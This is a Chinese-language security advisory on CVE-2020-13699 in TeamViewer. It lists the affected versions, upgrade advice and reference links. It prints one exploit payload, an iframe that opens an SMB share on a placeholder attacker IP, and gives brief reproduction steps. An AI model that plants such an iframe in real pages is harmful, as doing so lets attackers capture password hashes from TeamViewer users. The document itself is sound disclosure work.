近日,TeamViewer 官方发布了 TeamViewer 用户密码破解漏洞 的风险通告,漏洞概况如下:

CVE编号

CVE-2020-13699
风险等级高危

利用条件

访问攻击者精心构造的恶意页面

漏洞详情

TeamViewer是一款可以随时随地连接到远程桌面电脑、移动设备及Iot,让远程连接过程更加的快速和安全,轻松实现对文件、网络及程序的实时支持或访问的远程连接控制软件。

TeamViewer多个版本中存在 用户密码破解漏洞,攻击者通过让被攻击者点击精心构造的嵌入恶意iframe(iframe src="teamviewer10: --play \\attacker-IP\share\fake.tvs")的网页,以启动TeamViewer Windows桌面客户端并打开一个远程SMB共享,即可转发该请求(使用类似响应者)以执行代码(或捕获以进行哈希破解)。

复现过程

1.构造嵌入恶意iframe的页面。

2.访问恶意页面,即可启动TeamViewer。

雁行安全团队建议TeamViewer用户及时对受影响版本的TeamViewer进行升级。

漏洞影响范围

TeamViewer < 8.0.258861

TeamViewer < 9.0.28860

TeamViewer < 10.0.258873

TeamViewer < 11.0.258870

TeamViewer < 12.0.258869

TeamViewer < 13.2.36220

TeamViewer < 14.2.56676

TeamViewer < 15.8.3

修复建议

升级至最新版本 15.8.3,下载链接如下:

https://www.teamviewer.com/en/download/previous-versions/

参考链接

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

https://nvd.nist.gov/vuln/detail/CVE-2020-13699

声明:本文来自雁行安全团队,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。